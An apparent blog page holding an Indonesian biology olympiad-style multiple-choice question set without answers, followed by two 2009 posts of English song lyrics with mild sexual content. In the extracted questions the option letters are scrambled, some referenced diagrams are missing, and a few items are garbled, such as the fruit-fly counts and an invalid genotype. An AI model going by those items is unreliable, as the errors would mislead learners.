8. Kerusakan umum yang dijumpai pada DNA setelah pendedahan terhadap sinar ultraviolet adalah…. D. dimer purin A. dimer pirimidin E. transposisi B. rusaknya rantai tunggal C. delesi basa 9. Filamen aktin dijumpai pada berikut ini, kecuali A. Flagella bakteria B. Sarkomer sel-sel otot rangka C. Serat tegang dari fibroblast D. Mikrovili dari intestinal brush border E. Cincin kontraktil pada sel-sel hewan yang membelah 10. Struktur terspesialisasi yang berada pada ujung kromosom eukariot disebut D. sentromer A. terminator E. kinetokor B. telomer C. long terminal repeat (LTR) 11. Berikut pernyataan yang tidak benar mengenai DNA pada inti sel eukariot adalah…… A. Jumlah basa timin sama dengan jumlah basa pirimidin. B. DNA berbentuk heliks ganda dan linier C. Orientasi kedua rantai berlawanan arah (antiparalel) D. Ujung 3’ adalah gugus fosfat E. Tidak semua urutan basa dalam DNA adalah gen 12. Diketahui bahwa salah satu rantai dari DNA terdiri atas 23% A, 37% T, 16% C, dan 24% G. Komposisi basa dalam rantai DNA tersebut d. 23% A; 37% T; 16% C; 24% G a. 30% A; 30% T; 20% C; 20% G e. tidak dapat ditentukan. b. 20% A; 30% T; 30% C; 20% G c. 37% A; 23% T; 16% C; 24% G

MIKROBIOLOGI 1. Ragi Saccharomyces cerevisiae diklasifikasikan dalam : D. Ascomycota A. Eubacteria E. Basidiomycota B. Oomycota C. Zygomycota 2. Tipe flagella pada bakteri adalah sebagai berikut, kecuali : D. Amphitrika A. Lofotrika E. Politrika B. Monotrika C. Atrika 3. Bentuk-bentuk bakteri adalah sebagai berikut, kecuali : A. Sarcina D. Kokoid B. Basil E. Pseudo C. Spiral

2

4. Suatu kultur bakteri diawali dengan 4 sel bakteri per ml pada medium pengaya dengan fase lag 1 jam dan waktu generasi 20 menit. Berapa banyaknya sel yang ada pada 1 liter kultur ini: a. setelah 1 jam? b. setelah 2 jam? c. setelah 2 jam bila 0.25% sel awal mati? 5. Anda mengambil suatu kultur mikroba dan memfraksinasinya menjadi beberapa komponen. Salah satu komponen mengandung molekul berikut ini: asam acetylmuramat, acetylglucosamin, berbagai L dan D asam amino, dan asam teichoat maupun asam lipoteichoat. Komponen ini merupakan : A. Dinding sel suatu bakteri gram positif B. Glikogen C. Dinding sel suatu bakteri gram negatif D. Membran sitoplasma E. Dinding sel suatu ragi 6. Delapan koloni bakteri tampak pada plat agar setelah 24 jam; jumlah bakteri individual yang ada pada mulanya adalah.... D. 8 A. 2 E. 8 juta B. 4 C. 6 7. Postulat Koch adalah : A. Mikroorganisme tertentu selalu penyebab penyakit tertentu B. Metoda yang ditemukan oleh Koch untuk memurnikan mikroba C. Suatu prosedur laboratorium yang memungkinkan diperolehnya kembali mikroorganisme penyebab penyakit D. Suatu pedoman yang dipakai untuk mengungkapkan suatu agen penyebab penyakit 8. Dari kelompok organisme di bawah ini, yang tidak dapat menghasilkan ATP sendiri adalah ; D. Diatoms A. Lichenes E. Protozoa B. Bakteri C. Virus 9. Inkubasi bakteri gram negatif dengan lisozim pada medium isotonik menyebabkan bakteri berbentuk batang menjadi berbentuk bulat (spherical) . Penyebab fenomena ini adalah D. Rusaknya membran plasma A. Absorbsi air E. Perubahan pada ekspresi gen B. Destruksi dinding sel C. Destruksi sitoskeleton 10. Suatu cara yang mudah untuk mengisolasi spesies Bacillus dan Clostridium secara spesifik dari tanah adalah dengan: A. Menumbuhkannya secara aerobik pada medium yang mengandung glukosa B. Menumbuhkannya pada suhu tinggi C. Memanaskan tanah untuk membunuh semua sel vegetatif dan kemudian memungkinkan semua spora dari organisme ini untuk “berkecambah” dan tumbuh D. Menumbuhkannya pada suhu sangat rendah E. Menumbuhkannya secara anaerobik pada medium yang mengandung glukosa
3

11. Bakteri penyebab tetanus hanya dapat dibunuh dengan pemanasan yang lama di atas titik didih. Hal ini mengindikasikan bahwa bakteri tetanus…. A. memiliki dinding sel yang mengandung peptidoglikan B. melindungi diri sendiri dengan menyekresikan antibiotik C. mensekresikan endotoksin D. autotrof E. menghasilkan endospora 12. Suatu enzim yang mengkatalisis reaksi A A. panas reaksi B. konstanta kesetimbangan C. kesetimbangan konsentrasi A D. entropi reaksi E. laju dari kedua reaksi maju dan balik B merubah…

BIOTEKNOLOGI Gunakanlah tabel berikut untuk menjawab pertanyaan no. 1

1. Transkripsi gen X dikendalikan oleh transkripsi faktor A. Gen X ditranskripsi hanya ketika faktor A difosforilasi. Data pada distribusi jaringan dari faktor A dan aktivitas dari suatu protein kinase dan protein fosfatase spesifik untuk faktor A ditunjukkan pada tabel di atas. Dari tiga jaringan ini, gen X akan ditranskripsi pada D. otak dan jantung saja A. otot saja E. otot, jantung, dan otak B. jantung saja C. otak saja 2. Lac operon....... A. ditemukan di sel eukariot B. mengkode urutan asam amino pada laktase C. mengatur translasi dari mRNA D. mengatur transkripsi dengan mengaktifkan atau menginaktifkan produksi dari protein represor E. mengatur replikasi DNA dengan mengaktifkan atau menginaktifkan protein induser 3. Dalam usaha untuk mengklon protein manusia, material dari sel manusia di masukan ke dalam bakteri. Material yang berasal dari sel manusia tersebut adalah.... A. Segmen DNA yang mengkode mRNA yang di transkripsi B. rRNA dan tRNA yang dipergunakan selama proses translasi C. protein yang mentraskripsi mRNA di inti D. protein mRNA yang ditemukan di sitoplasma E. intron yang dilepaskan dari protein mRNA yang di transkripsi dan belum diproses
4

4. Perhatikan diagram dibawah ini!

Tanda panah pada diagram menunjukkan tempat pemotongan dari enzim Tag I. Manakah hasil pemotongan yang tepat dari enzim tersebut?

5. Kinetik hibridisasi double helix DNA sangat berhubungan dengan urutan basa nitrogen pada helix tersebut. Pada temperatur di bawah titik leleh untai DNA komplementer, maka kebanyakan DNA … A. Rantai tunggal oleh denaturasi pada suhu yang lebih rendah B. Rantai ganda akibat kuatnya ikatan hydrogen C. Hibridisasi untuk membentuk untai yang lebih panjang dan stabil D. Urutan basa yang sangat kompleks yang menjadi sederhana ketika suhu dinaikkan E. Mampu menyerap sinar UV lebih banyak dibandingkan dengan temperatur di atas titik lelehnya. 6. ……… ……. adalah suatu teknologi yang menggabungkan gen dari sumber yang berbeda kemudian mentransfernya ke sel dimana gen tersebut akan diekspresikan. Di alam, gen bakteri dapat ditransfer dari satu sel ke sel lainnya melalui 3 proses yaitu 1) ……………, 2) …………...., dan 3) ……….….. 7. Metode yang digunakan untuk mendeteksi suatu protein adalah … D. Northern blotting A. Polymerase chain reaction (PCR) E. Eastern blotting B. Western blotting C. Southern blotting 8. Metode yang digunakan untuk mendeteksi DNA adalah … D. Northern blotting A. Polymerase chain reaction (PCR) E. Eastern blotting B. Western blotting C. Southern blotting 9. Metode yang digunakan untuk mendeteksi RNA adalah … A. Polymerase chain reaction (PCR) D. Northern blotting B. Western blotting E. Eastern blotting C. Southern blotting

5

Gunakan petunjuk berikut ini untuk menjawab pertanyaan No.10-11 tentang rekayasa genetik. Plasmid bakteri dengan urutan: ATCCCA… 1000 nukleotida… …ATTAAGGCCTTACAGGACCCCGGAATGAGAGTA ATGGGCTATTCAGGTA … 200 nukleotida lagi. Urutan DNA manusia: ATATCGTAATGTTGGTG...500 nukloetida.. ..GTGTCAGGACGGGTGAAAGCCAGGACGCCGAATCG… 5000 nukleotida lagi. Ket: Urutan DNA yang digarisbawahi menunjukkan gen yang akan diklon Urutan enzim restriksi ERA I: GTAAATG CRO I: CAGGAC MEM II: GCCG 10. Berapa banyak sisi restriksi yang terdapat pada urutan plasmid bakteri? A. Tidak ada D. 3 B. 1 E. Lebih dari 3 C. 2 11. Enzim manakah yang seharusnya digunakan untuk memasukkan urutan DNA manusia ke dalam plasmid bakteri? A. ERA I B. CRO I C. MEM II D. CRO I dan ERA I E. ERA I, CRO I, dan MEM II 12. Mengapa enzim restriksi yang terdapat pada suatu sel tidak merusak DNA sel tersebut meskipun sel tersebut memiliki urutan yang mampu dikenali oleh enzim restriksinya? ……………………………………………………………………………………………… ………………………………………………………………………………………………

6

ANATOMI DAN FISIOLOGI TUMBUHAN 1. Laju transpirasi suatu pohon kemungkinan akan meningkat seiring dengan.... A. peningkatan suhu saja. B. peningkatan kelembaban dan suhu. C. peningkatan kelembaban dan penurunan suhu. D. peningkatan kelembaban dan pergerakan udara. E. peningkatan suhu dan pergerakan udara. Suatu teknik yang telah disempurnakan digunakan untuk memotong ujung akar dan menempatkannya pada larutan nutrien steril. Dalam kondisi suhu yang diatur, ujung akar tersebut akan memanjang dan menghasilkan akar sekunder. Seorang peneliti melakukan pengukuran harian terhadap akar tomat pada suhu 33°C-35°C dengan cara ini. Hasilnya dipetakan pada grafik berikut.

2. Ujung akar tidak menunjukkan adanya pertumbuhan.... D. pada akhir hari ke sepuluh. A. pada akhir hari pertama. E. pada waktu yang tidak ditunjukkan B. pada akhir hari ke tiga. oleh grafik. C. pada akhir hari ke delapan. 3. Peningkatan terkecil pada pertumbuhan dicapai.... D. pada hari ke tiga. A. selama tiga hari pertama. E. pada hari ke delapan. B. selama tiga hari terakhir. C. selama tiga hari pertengahan. 4. Grafik akan menunjukkan garis lurus jika.... A. laju pertumbuhan setelah hari ke delapan memiliki laju yang sama dengan hari sebelumnya. B. ujung akar memanjang dengan laju yang sama setiap hari. C. suhunya dipertahankan 37°C secara konstan. D. pertumbuhan pada dua hari pertama identik. E. larutan nutrien kemudian ditambah dengan hormon pertumbuhan akar. 5. Struktur yang menghantarkan materi ke seluruh tubuh tanaman disebut.... A. lentisel C. ikatan pembuluh B. meristem D. kambium
7

E. epidermis 6. Sel-sel pembuat makanan pada tumbuhan terletak di.... A. xilem D. jaringan spons B. floem E. pembuluh C. kayu 7. Kambium terletak di dekat.... A. stomata B. sel penjaga C. epidermis

D. rambut akar E. xilem dan floem

8. Tumbuhan hijau melakukan respirasi.... A. hanya pada siang hari. B. hanya pada malam hari. C. siang dan malam. D. hanya ketika fotosintesis sedang berjalan. E. hanya ketika fotosintesis tidak sedang berjalan. 9. Selama respirasi, tumbuhan hijau menyerap.... A. air B. karbon dioksida C. oksigen

D. karbon dioksida dan air E. oksigen dan air

10. Tumbuhnya daun menuju cahaya dihasilkan dari.... A. konsentrasi auksin yang lebih besar pada bagian yang terlindungi. B. konsentrasi auksin yang lebih besar pada bagian yang terkena cahaya. C. konsentrasi auksin yang sama pada seluruh sisi batang. D. fototropisme negatif. E. geotropisme positif.

ANATOMI DAN FISIOLOGI HEWAN 1. Pernyataan manakah yang menggambarkan mekanisme umpan balik yang melibatkan kelenjar tiroid? A. Produksi estrogen merangsang pembuntukan gamet untuk reproduksi seksual. B. Kadar oksigen di dalam darah berhubungan dengan detak jantung. C. Produksi urin memungkinkan untuk ekskresi buangan sel. D. Jumlah karbon dioksida di dalam daran meningkat dengan olah raga. E. Hipotalamus mengurangi masukan TSH ke pituitary. 2. Ketika wanita hamil mengkonsumsi alkohol dan nikotin, embrionya berada dalam resiko karena racun-racun tersebut dapat.... A. mempengaruhi ovulasi. B. pindah ke embrio karena darah ibu bercampur dengan darah embrio di dalam plasenta. C. berdifusi dari darah ibu ke darah embrio di dalam plasenta. D. memasuki uterus melalui perut ibu.
8

E. berdifusi ke dalam air susu ibu yang akan diminum oleh bayi. 3. Kondisi kelebihan berat badan dapat disebabkan oleh faktor-faktor berikut, kecuali.... A. makan berlebih B. tidak olah raga C. memakan terlalu banyak makanan berkalori tinggi D. kekurangan besi dalam diet E. gangguan kelenjar tiroid 4. Fungsi utama nefron adalah untuk.... A. memecah sel darah merah untuk membentuk buangan nitrogen. B. membentuk urea dari produk-produk buangan hasil metabolisme protein. C. mengatur komposisi kimia darah. D. menyerap makanan yang dicerna dari dalam usus halus. E. mengumpulkan urin setelah mengalir melalui uretra. 5. Manakah berikut ini yang mewakili urutan normal tahap-tahap perkembangan embrio? A. Formasi gastrula – formasi blastula – formasi mesoderm – pembelahan – formasi otot. B. Pembelahan – formasi blastula – formasi otot – formasi gastrula – formasi mesoderm. C. Pembelahan – formasi blastula – formasi mesoderm – formasi gastrula – formasi otot. D. Pembelahan – formasi blastula – formasi gastrula – formasi mesoderm – formasi otot. E. Formasi blastula – formasi gastrula – formasi mesoderm – pembelahan – formasi otot. 6. Humerus, tulang lengan atas manusia, dihubungkan secara langsung dengan tulang lengan lainnya oleh.... D. ligamen A. jaringan rawan E. jaringan adiposa B. tendon C. ekstensor 7. Penyakit darah Rh dapat terjadi apabila ibu dengan Rh negatif.... D. memiliki bayi Rh negatif. A. mengalami eritroblastosis. E. memiliki bayi Rh positif B. gagal membentuk antibodi. C. harus mengganti darahnya. 8. Sekret yang mencerna karbohidrat dan protein adalah.... D. getah lambung A. ptialin E. getah pankreas B. saliva C. pepsin 9. Laju pernapasan dikendalikan oleh... A. paru-paru B. bronki C. kantung udara

D. medulla E. diafragma

10. Pada hari yang lembab, orang merasa tidak nyaman karena.... A. ia lebih banyak berkeringat. B. terdapat lebih sedikit evaporasi keringat. C. keringat mengevaporasi dengan cepat. D. kulit mengekskresikan garam dalam jumlah yang lebih besar. E. permukaan kulit terlalu kering.
9

GENETIKA Soal 1-2. Warna pada kembang sepatu merupakan sifat yang diturunkan secara poligeni. Sifat ini diatur oleh tiga gen (ABC) yang apabila berada pada keadaan homozigot dominan untuk ketiga gen akan menghasilkan warna jingga, dan jika berada dalam keadaan homozigot resesif untuk ketiga gen maka warna bunga menjadi putih. Gen A merupakan gen yang mengkode bahan baku untuk pigmen yang bisa diubah menjadi berbagai warna. Bunga jingga disilangkan dengan bunga hijau menghasilkan jumlah keturunan sebagai berikut; 75 bunga jingga 27 bunga merah 23 bunga kuning 8 bunga hijau 1. Tentukan jenis penyimpangan hukum mendel pada persilangan diatas. 2. Tentukan genotip dari induk yang berwarna jingga. 3. B-S. Proses pengubahan dari diploid menjadi haploid terjadi setelah meosis 2, karena pada saat itu jumlah kromosom hasil pembelahan adalah setengah dari jumlah kromosom sel induk. 4. Hasil persilangan F1 pada persilangan dihibrid yang dilakukan Mendel menghasilkan perbandingan 9;3;3;1. Hal ini terjadi karena semua sifat terletak pada kromosom yang berbeda. Namun apa bila kedua sifat terletak pada kromosom yang sama maka hasil persilangan F1-nya adalah..... D. 12:3:1 A. tetap 9:3:3:1 E. 9:7 B. 1:1 C. 9:3:4 5. Pada golongan darah terdapat tiga jenis alel, IA, IB, IO. Apabila seseorang memiliki alel IAIB di dalam tubuhnya maka orang tersebut memiliki golongan darah AB. Sifat alel IAIB dalam pembentukan golongan darah AB disebut.... D. Kriptomeri A. Kodominan E. Inkomplit dominan B. Epistasis C. Interaksi alel 6. Dua ekor ayam disilangkan dan diperoleh keturunan sebagai berikut: 10 walnut dan 3 rose. Berdasarkan keterangan diatas, maka genotip dari kedua induk adalah..... A. rrPp dan RRPp B. RrPP dan RRPp C. rrPP dan rrPp D. RrPP dan rrpp E. RrPp dan rrPP 7. Seorang ibu carrier terhadap sifat buta warna menikah dengan laki-laki normal. Apabila pasangan keluarga tersebut berharap memiliki 3 anak lelaki, maka peluang keluarga tersebut memiliki dua anak laki-laki normal dan satu buta warna adalah...... A. 4.7% B. 1.56%
10

C. 12.5% E. 6.25% D. 18.75% 8. Berat buah labu ditentukan oleh beberapa gen yang dikenal dengan istilah poligeni. Labu dengan genotip AABbcc memiliki berat buah 27 gr sedangkan labu dengan genotip AaBBCc memiliki berat buah 30 gr. Berdasarkan keterangan tersebut tentukanlah jumlah fenotip dari hasil persilangan kedua labu tersebut! D. 9 fenotip A. 6 fenotip E. 7 fenotip B. 4 fenotip C. 5 fenotip 9. Pada lalat buah diketahui bahwa sayap panjang (V) dominan terhadap sayap pendek (v) dan mata merah (M) dominan terhadap mata coklat (m). Seekor lalat yang heterozigot terhadap kedua sifat disilangkan dengan lalat yang homozigot resesif untuk kedua sifat. Hasil persilangannya adalah sebagai berikut: 180 ekor sayap panjang mata coklat; 35 ekor sayap panjang ekor sayap panjang mata merah; 33 ekor sayap pendek mata coklat; 182 ekor pendek mata merah. Berdasarkan informasi diatas maka pernyataan berikut yang benar adalah.... A. Gen yang mengatur panjang sayap dan dan warna mata terletak pada kromosom yang sama B. Gen yang mengatur panjang sayap dan warna mata terletak pada kromosom yang terpisah C. Gen yang mengatur warna mata terpaut kromosom seks sedangkan gen yang mengatur panjang sayap terletak pada autosom D. Kedua gen terpaut dan pada saat pembentukan gamet terjadi peristiwa pindah silang. E. Kedua gen bersifat kodominan. 10. Pada suatu populasi yang terdiri atas 1000 penduduk diketahui bahwa jumlah orang yang bergolongan darah O adalah adalah 16% dari jumlah penduduk dan jumlah penduduk yang bergolongan darah AB dan B masing-masing adalah 100 dan 90 orang. Tentukanlah frekuensi alel IA pada populasi tersebut. A. 0.5 B. 0.2 C. 0.4 D. 0.7 E. 0.6 11. Populasi dengan alel T dan t yang seimbang memiliki 36% individu dalam populasi dengan fenotip resesif. Tiba-tiba kondisi lingkungan berubah dan menyebabkan kematian dari semua individu yang homozigot dominan sebelum mencapai usia dewasa. Setelah kejadian tersebut, kondisi lingkungan kembali normal. Berapa frekuensi alel T setelah satu generasi? A. 0,4. B. 0,26. C. tidak dapat ditentukan D. 0,7. E. 0,58.

11

12. Seorang wanita bergolongan darah O Rh- menikah dengan laki-laki dengan golongan darah AB Rh+. Apabila anak pertama mereka adalah laki-laki A Rh- maka pernyataan berikut yang tepat adalah.... A. Peluang untuk memperoleh anak kedua perempuan dengan golongan darah A dan Rh+ adalah 0% B. Peluang memperoleh anak kedua perempuan, bergolongan darah B dan Rh+ adalah 12.5% C. Jika anak kedua adalah Rh+ dan bergolongan darah A maka kemungkinan anak ketiga lahir normal adalah 12.5% D. Probabilitas anak kedua bergolongan darah A dan AB adalah sama E. Probabilitas anak bergolongan darah O sama dengan Probabilitas anak A dan B 13. Seorang laki dengan genotip AaBaCCDd (A dengan D terpaut). Apabila ia menghasilkan sperma, maka jumlah gamet yang dapat dibentuknya adalah...... D. tidak dapat ditentukan A. 4 E. 2 B. 8 C. 16 14. Haemofilia merupakan penyakit menurun yang terpaut seks dan bersifat resesif. Jika seorang wanita yang ayahnya haemofilia menikah dengan laki-laki normal. Berapakan kemungkinan pasangan tersebut memiliki anak laki-laki yang menderita haemofilia? D. 75% A. 0% E. 100% B. 25% C. 50% 15. Jika A menunjukan alel dominan dan a adalah alel resesif, apakah genotip dari orang tua yang menghasilkan 300 keturunan dengan sifat dominan dan 100 keturunan dengan sifat resesif? D. Aa x aa A. AA x AA E. Aa x Aa B. AA x Aa C. AA x aa

EVOLUSI 1. “Suatu struktur diperoleh, membesar, tereduksi atau hilang melalui penggunaan dan penghentian penggunaan. Perubahan tersebut diturunkan pada generasi berikutnya.” Pendapat tersebut adalah pendapat…. D. Wallace A. Darwin E. Oparin B. Lamarck C. Mendel 2. Pada fenomena manakah berikut ini pengamatan Darwin tentang burung finch di kepulauan Galapagos menjadi contoh klasik? A. Kesetimbangan Hardy-Weinberg B. Spesiasi simpatrik C. Radiasi adaptif D. Evolusi konvergen E. Ketidakmampuan untuk terbang

12

3. Pada situasi manakah berikut ini evolusi berjalan paling lambat untuk suatu populasi ‘inter-breeding’? migrasi tekanan seleksi variasi karena mutasi A. tidak ada rendah rendah B. tidak ada tinggi tinggi C. tinggi rendah tinggi D. tinggi tinggi rendah E. tinggi tinggi tinggi 4. Yang dimaksud dengan struktur analog adalah.... A. struktur yang memiliki karakter anatomi dasar yang sama, asal evolusi yang berbeda, tapi dapat digunakan untuk fungsi yang sama. B. struktur yang memiliki karakter anatomi dasar yang sama, asal evolusi yang sama, tapi dapat digunakan untuk fungsi yang sama. C. struktur yang memiliki karakter anatomi dasar yang sama, asal evolusi yang berbeda, tapi dapat digunakan untuk fungsi yang berbeda. D. struktur yang memiliki karakter anatomi dasar yang berbeda, asal evolusi yang berbeda, tapi dapat digunakan untuk fungsi yang sama. E. struktur yang memiliki karakter anatomi dasar yang sama, asal evolusi yang sama, tapi dapat digunakan untuk fungsi yang berbeda. Gunakanlah pilihan berikut ini untuk menjawab pertanyaan no. 5 dan 6. I. II. III. IV. Leher jerapah. Berat bayi manusia pada waktu lahir. Populasi burung Finch di Galapagos. Kadal Aristelliger kecil bermasalah dalam mempertahankan teritorinya, sedangkan yang besar mudah dimangsa burung hantu. V. Populasi Biston betularia pada waktu revolusi industri. VI. Resistensi DDT pada serangga. 5. Seleksi stabilisasi (’stabilizing selection’) ditunjukkan oleh.... A. II dan IV D. IV saja B. III dan VI E. III saja C. II dan V 6. Seleksi mengarahkan (’directional selection’) ditunjukkan oleh.... D. I, V dan VI A. III, V dan VI E. II, IV dan V B. I, II dan III C. II, III dan V 7. Berikut ini pernyataan yang salah adalah.... A. Seleksi alam bekerja pada individu. B. Evolusi adalah perubahan pada frekuensi alel dari suatu populasi. C. Seleksi alam mengarahkan populasi menjadi lebih sesuai terhadap lingkungannya. D. Materi genetik dari individu adalah genotip, sedangkan materi genetik dari populasi adalah ‘gene pool’. E. Seleksi alam menyebabkan perubahan genetik pada individual.

13

8. Dua spesies yang berbeda tidak dapat melakukan perkawinan karena adanya mekanisme isolasi reproduktif. Jika spesies yang serupa memiliki perbedaan struktural pada organorgan reproduksinya, maka mekanisme isolasi reproduksi ini disebut dengan.... D. isolasi temporal A. isolasi gametik E. isolasi sterilisasi B. isolasi perilaku C. isolasi mekanis 9. Jika kembar identik albino menikah dengan kembar identik berambut keriting, anak dari kedua pasangan secara genetis kemungkinan.... A. berbeda, karena adanya segregasi acak pada waktu meiosis induk. B. berbeda, karena tingginya kemungkinan terjadinya mutasi acak. C. identik, karena ‘gene pool’ yang sifatnya umum dari induk. D. identik, karena rendahnya kemungkinan mutasi. E. identik, kecuali terjadi pindah silang. 10. Manakah berikut ini yang merupakan kesamaan antara teori Darwin dan teori Lamarck mengenai evolusi? A. Adaptasi merupakan hasil dari perbedaan kesuksesan reproduksi. B. Evolusi mengarahkan organisme menjadi lebih kompleks. C. Adaptasi evolusioner merupakan hasil dari interaksi antara organisme dengan lingkungannya. D. Adaptasi merupakan hasil dari penggunaan dan penghentian penggunaa struktur anatomi. E. Catatan fosil mendukung pendapat bahwa spesies adalah tetap, tidak berubah.

14

EKOLOGI 1. Manakah berikut ini yang mungkin terjadi di dalam suatu ekosistem? A. Ketika jumlah mangsa menurun, jumlah predator meningkat. B. Ketika jumlah predator meningkat, jumlah mangsa meningkat. C. Ketika jumlah mangsa meningkat, jumlah predator meningkat. D. Ketika jumlah mangsa meningkat, jumlah predator menurun. E. Ketika jumlah predator menurun, jumlah mangsa menurun. Hubungan yang digambarkan dalam rantai makanan dapat juga diekspresikan sebagai piramid makanan. Perbedaan utamanya adalah; di dalam piramida makanan, seperti yang terlihat pada gambar, terdapat indikasi jumlah relatif individu dan jumlah energi yang terlibat pada setiap tingkat.

2. Pernyataan manakah yang paling baik menyimpulkan hubungan tersebut? A. Ketika puncak piramid dicapai, jumlah individu menurun tapi jumlah energinya meningkat. B. Ketika puncak piramid dicapai, jumlah individu meningkat, dan jumlah energi tetap sama dengan tingkatan lainnya. C. Pada dasar piramid, jumlah individu dan jumlah energi yang terlibat adalah paling besar. D. Pada dasar piramid, jumlah individu dan jumlah enrgi yang terlibat adalah paling rendah. E. Pada semua tingkat, jumlah individu dan jumlah energi yang terlibat adalah sama. 3. Kelinci menjadi ancaman di Australia karena.... A. mereka memindahkan ‘rabbit fever’ ke kangguru. B. liang mereka di dalam tanah berbahaya bagi ternak. C. tidak adanya musuh alami menyebabkan mereka berbiak tak terbatas. D. mereka menyebabkan myxomatosis bagi bayi-bayi yang baru lahir. E. mereka mengambil nutrisi yang berharga dari tanah. 4. Pada khatulistiwa, tipe pertumbuhan taiga.... A. tidak mungkin. B. terjadi hanya di musim dingin.
15

C. terjadi di dalam.

lorong-lorong

yang

D. terjadi di gunung-gunung yang E. terjadi hanya di gurun. tinggi. 5. Dibandingkan dengan daratan, suhu bioma laut.... A. di bawah titik beku. B. lebih stabil. C. kurang stabil. D. lebih sedikit menyerap radiasi sinar matahari. E. memiliki kondisi ekstrim yang lebih. 6. Keanekaragaman spesies dalam suatu komunitas ditentukan oleh: A. frekuensi relatif spesies B. kelimpahan relatif spesies C. kekayaan/jumlah spesies D. A dan B benar E. B dan C benar 7. Sejenis ulat mempertahankan dirinya dari predator dengan cara membesarkan kepalanya sehingga menyerupai kepala ular yang ganas. Pertahanan seperti ini adalah contoh dari: D. pertahanan mekanis A. mimikri Müllerian E. kamouflase B. mimikri Batesian C. pertahanan aposematik 8. Kompetisi antara populasi dua spesies dengan relung (niche) yang hampir sama, pada akhirnya dapat mengakibatkan terjadinya: A. eliminasi (penyingkiran) populasi yang kalah bersaing B. pembagian sumber daya (resource partitioning) melalui seleksi alam C. proses koevolusi D. jawaban A dan B benar E. jawaban A dan C benar

BIOSISTEMATIK 1. Pertumbuhan biji yang tidak terlindungi oleh ovarium merupakan karakteristik dari...... A. Angiospermae D. Gymnospermae B. Paku E. Lumut C. Alga hijau 2. Generasi gametofit lebih dominan dari generasi sporofit, dan generasi sporofit masih menumpang pada generasi gametofit, merupakan karakter dari..... D. Gymnospermae A. Angiospermae E. Lumut B. Paku C. Alga hijau 3. Tumbuhan yang menghasilkan buah, memiliki daun dengan tulang daun bercabang membentuk pola menyerupai jala, dan memiliki berkas pembuluh pada batang yang tersusun secara melingkar adalah..... A. tanaman jagung B. paku C. lumut
16

D. tanaman kacang E. pinus 4. Di suatu hutan tropis, seorang mahasiswa menemukan beberapa jenis tumbuhan dengan ciri-ciri sebagai berikut : Bentuk hidup pada umumnya herba atau perdu, pada beberapa jenis memiliki getah berwarna putih. Tumbuhan-tumbuhan tersebut memiliki macam daun tunggal, filotaksis daun ada yang tersebar dan ada pula yang berhadapan dengan tepi daun bergerigi. Perbungaan tersusun dalam kapitulum yang dilindungi oleh involukrum dan ditemukan dua macam bunga (bunga pita dan bunga tabung) yang berwarna kuning dan ungu. Berdasarkan ciri-ciri tersebut, beberapa jenis tumbuhan ini tergolong dalam satu suku………………….. A. Graminae B. Moraceae C. Euphorbiaceae D. Liliaceae E. Asteraceae 5. Diagram kekerabatan enam jenis tumbuhan dapat dinyatakan dalam dendogram di bawah ini. Jika cabang-cabang pada diagram berikut ini menyatakan kesaman karakter tumbuhan, angka satu meyatakan kesamaan paling tinggi dan angka nol menyatakan tidak ada karakter yang sama, maka dendogram berikut menyatakan

A. B. C. D. E.

Sp.1 dan Sp.2 tidak mungkin berkerabat Sp. 3 dan Sp. 4 berkerabat paling dekat dibandingkan jenis lainnya Sp. 5 dan Sp. 6 berkerabat paling dekat Sp.1 dan Sp.2 merupakan organisme yang sama Tidak mungkin ada dendogram seperti ini

6. Identifikasi suatu tumbuhan dapat dilakukan dengan cara: A. Menggunakan kunci identifikasi B. Membandingkan dengan tumbuhan di Kebun Raya yang telah diketahui namanya C. Membandingkan gambar dalam pustaka botani D. Membandingkan dengan spesimen awetan di herbarium E. Semua cara di atas dapat dilakukan 7. Salah satu aspek taksonomi yang hanya mengamati karakteristik morfologi saja disebut dengan : C. Alpha taxonomy A. Omega taxonomy B. Beta Taxonomy D. Modern taxonomy
17

E. Cladistic 8. Spesies manakah yang kemungkinan lebih banyak berhasil/lulus hidup pada berbagai perubahan lingkungan sepanjang masa dari kedua diagram pohon filogeni di bawah ini?

A. A & C B. H & I C. C & G
***

D. X & Y E. Y saja.

[+/-] Selengkapnya...

Jumat, 06 Maret 2009

I've got no regret right now (I'm feelin' this)
The air is so cold and null (I'm feelin' this)
Let me go in her room (I'm feelin' this)
I wanna take off your clothes(I'm feelin' this)
Show me the way to bed (I'm feelin' this)
Show me the way you move (I'm feelin' this)
Fuck it it's such a blur (I'm feelin' this)
I love all the things you do (I'm feelin' this)

Fate fell short this time
Your smile fades in the summer
Place your hand in mine
I'll leave when I wanna

Where do we go from here
Turn all the lights down now
Smiling from ear to ear (I'm feelin' this)
Our breathing has got too loud (I'm feelin' this)
Show me the bedroom floor (I'm feelin' this)
Show me the bathroom mirror (I'm feelin' this)
We're taking this way too slow (I'm feelin' this)
Take me away from here (I'm feelin' this)

Fate fell short this time
Your smile fades in the summer
Place your hand in mine
I'll leave when I wanna

Fate fell short this time
Your smile fades in the summer
Place your hand in mine
I'll leave when I wanna

This place was never the same again after you came and went
How can you say you meant anything different to anyone
Standing alone on the street with a cigarette
On the first night we met.

Look to the past and remember her smile
And maybe tonight I can breathe for awhile
I'm not in the scene, I think I'm fallin' asleep
But then all that it means is I'll always be dreamin' of you

Fate fell short this time
Your smile fades in the summer
Place your hand in mine
I'll leave when I wanna

Fate fell short this time
Your smile fades in the summer
Place your hand in mine
I'll leave when I wanna

Fate fell short this time
Your smile fades in the summer (so lost and disillusioned)
Place your hand in mine
I'll leave when I wanna (so lost and disillusioned)

Fate fell short this time (are we alone do you feel it)
Your smile fades in the summer (so lost and disillusioned)
Place your hand in mine (are we alone do you feel it)
I'll leave when I wanna (so lost and disillusioned)

Fate fell short this time (are we alone do you feel it)
Your smile fades in the summer (so lost and disillusioned)
Place your hand in mine (are we alone do you feel it)
I'll leave when I wanna (so lost and disillusioned)

[+/-] Selengkapnya...

Rabu, 04 Maret 2009

Hello there,
the angel from my nightmare,
the shadow in the background of the morgue.
The unsuspecting victim,
of darkness in the valley,
we can live like Jack and Sally if we want,
where you can always find me.
We'll have Halloween on Christmas.
And in the night we'll wish this never ends,
we'll wish this never ends...
(miss you miss you)
(miss you miss you)

Where are you,
and i'm so sorry,
I cannot sleep i cannot dream tonight!
I need somebody and always,
This sick strange darkness
comes creeping on so haunting everytime.
And as i stared i counted, the webs from all the spiders, catching things and eating their in sides.
Like indecision to call you,
and hear your voice of treason,
Will you come home and stop this pain tonight?
Stop this pain tonight.

Dont waste your time on me you're already the voice in side my head!
(miss you miss you)

Dont waste your time on me you're already the voice in side my head!
(miss you miss you)

Dont waste your time on me you're already the voice in side my head!
(miss you miss you)

